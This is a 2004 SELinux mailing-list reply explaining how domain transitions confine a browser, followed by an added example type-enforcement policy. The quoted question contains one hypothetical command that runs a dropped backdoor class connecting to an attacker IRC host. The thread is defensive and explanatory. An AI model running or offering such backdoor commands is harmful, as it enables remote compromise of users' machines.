SELinux and the Desktop

Stephen Smalley sds at epoch.ncsc.mil
Thu Oct 14 18:35:39 UTC 2004


On Thu, 2004-10-14 at 13:56, Steve Coleman wrote:
> So just to clarify, what's the difference between a user running a script 
> file that does exec "java ./MyClass.class" and a stack overrun causing a 
> browser with a smashed stack to save a MyBackdoor.class to the local 
> file system and execing "java ./MyBackdoor.class -irc 
> blackhathosting.org" ?

Calling context.  User is initially in a given domain (e.g. user_t),
runs script file that may or may not transition depending on policy. 
Browser runs in a different domain (e.g. user_mozilla_t) that has a
subset of user_t's permissions.  Further, files writable by browser
domain are not executable by user directly without explicit relabel by
user.  (Note:  I don't know if that is still true in the present Fedora
policy, but certainly possible to configure it that way).

> In both cases it's the same user, and in both cases it's the same java VM 
> binary. 

SELinux can capture the entire call chain (via execve, not function
calls here) if desired, e.g. distinguishing here on the browser,
although you typically only encode new domains where you cross a trust
boundary.

> The java binary is likely the only process that knows enough to 
> enforce anything here based on when, what, and where things are run by 
> the user.

SELinux can enforce a coarse-grained policy over the maximum access
granted to the process.  But I agree that the VMM ultimately needs some
awareness of security to refine that policy to deal with the
finer-grained internal abstractions it manages.  Nonetheless, you don't
want to rely entirely on the VMM's enforcement, as it may be subverted
itself.

-- 
Stephen Smalley <sds at epoch.ncsc.mil>
National Security Agency
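As an added illustration of the calling-context argument in the reply above (my own example, not code from the post or from any Fedora policy; user_t and user_mozilla_t follow the post, while mozilla_exec_t, user_mozilla_rw_t, user_home_t and the attribute names are assumed, and class and attribute declarations are taken to come from the base policy), a raw type-enforcement fragment:

```selinux
# Types involved (assumed names apart from user_t / user_mozilla_t).
type user_t, domain;
type user_mozilla_t, domain;
type mozilla_exec_t, file_type, exec_type;   # the browser binary
type user_mozilla_rw_t, file_type;           # files the browser may write (downloads, cache)
type user_home_t, file_type;                 # the user's own files

# Automatic domain transition: executing the browser from user_t lands in
# user_mozilla_t.  The transition is the "calling context" that distinguishes
# the browser's later execve() of java from the user's own shell doing it.
allow user_t mozilla_exec_t:file { read getattr execute };
allow user_mozilla_t mozilla_exec_t:file entrypoint;
allow user_t user_mozilla_t:process transition;
type_transition user_t mozilla_exec_t:process user_mozilla_t;

# The browser domain may create and write files, but only of its own type.
allow user_mozilla_t user_mozilla_rw_t:dir { search read write add_name remove_name };
allow user_mozilla_t user_mozilla_rw_t:file { create read write getattr setattr unlink };

# Neither domain gets execute on browser-written files.  A saved
# MyBackdoor.class stays inert until the user deliberately relabels it.
allow user_t user_mozilla_rw_t:file { read getattr relabelfrom };
allow user_t user_home_t:file relabelto;   # explicit step: chcon -t user_home_t ...

# Browser domain is a strict subset of user_t: enforced at policy-build time,
# so a smashed stack inside the browser cannot write or execute home files.
neverallow user_mozilla_t user_home_t:file { write execute execute_no_trans };
neverallow user_mozilla_t user_mozilla_rw_t:file { execute execute_no_trans };
```

The neverallow lines make the policy compiler reject any later rule that would widen the browser domain past the user's permissions, which is the property the reply relies on.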
